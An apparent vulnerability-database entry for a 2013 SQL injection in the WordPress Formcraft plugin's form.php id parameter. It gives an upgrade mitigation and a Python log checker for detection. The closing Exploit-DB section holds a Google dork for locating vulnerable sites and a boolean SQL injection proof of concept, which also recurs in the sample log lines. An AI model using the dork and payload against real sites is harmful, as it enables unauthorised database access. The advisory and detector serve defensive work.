Vendor: Formcraft Plugin
By: Ashiyane Digital Security Team
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Formcraft Plugin
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux
2013

WordPress formcraft Plugin SQL Injection

A SQL injection vulnerability exists in the formcraft plugin for WordPress. An attacker can send a specially crafted request to the form.php script with an SQL payload in the id parameter to execute arbitrary SQL commands.

Mitigation:

Upgrade to the latest version of the formcraft plugin.
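
Added example (not part of the original advisory or the plugin's code): a log check that finds requests to form.php whose id parameter is not a plain integer, for reviewing exposure before and after the upgrade. It assumes combined-format web server access logs and that legitimate id values are numeric; the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Script path and parameter named in the advisory.
PLUGIN_PATH = "/wp-content/plugins/formcraft/form.php"
PARAM = "id"

# Request field of a combined-format access log line (assumed log format).
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample lines, not taken from a real server.
SAMPLE_LOG = [
    '203.0.113.5 - - [02/Dec/2013:10:00:01 +0000] "GET /wp-content/plugins/formcraft/form.php?id=12 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [02/Dec/2013:10:00:07 +0000] "GET /wp-content/plugins/formcraft/form.php?id=1%20and%201=1 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [02/Dec/2013:10:00:09 +0000] "GET /blog/wp-content/plugins/formcraft/form.php?id= HTTP/1.1" 200 312',
    '198.51.100.7 - - [02/Dec/2013:10:00:11 +0000] "GET /index.php?id=1%20and%201=1 HTTP/1.1" 200 900',
]


def scan(lines):
    """Return (line_number, decoded_id) for each request to form.php whose
    id value is not a plain integer (assumption: legitimate ids are numeric)."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        parts = urlsplit(match.group("target"))
        # endswith() also covers WordPress installed in a subdirectory.
        if not parts.path.lower().endswith(PLUGIN_PATH):
            continue
        # parse_qs percent-decodes values; blank values are kept and flagged.
        for value in parse_qs(parts.query, keep_blank_values=True).get(PARAM, []):
            if not re.fullmatch(r"[0-9]+", value):
                hits.append((number, value))
    return hits


if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: suspicious id value {value!r}")
```

The check only sees parameters sent in the URL; requests that carry id in a POST body do not appear in standard access logs.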

Exploit-DB raw data:

#######################################################################
# Exploit Title : Wordpress formcraft Plugin Sql Injection
#
# Exploit Author : Ashiyane Digital Security Team
#
# Google Dork : inurl:/wp-content/plugins/formcraft
#
# Software Link : www.wordpress.org
#
# Tested on: Windows , Linux
#
# Date: 2013/12/2
#
#############################################
# Exploit : Sql Injection
#
# Location1:
[Target]/wp-content/plugins/formcraft/form.php?id=[Sql]
#
#
#
# Exploit-DB Note:
# A PoC: form.php?id=1%20and%20 1=1
##########################################

##############
Milad Hacking

We Love Mohammad
##############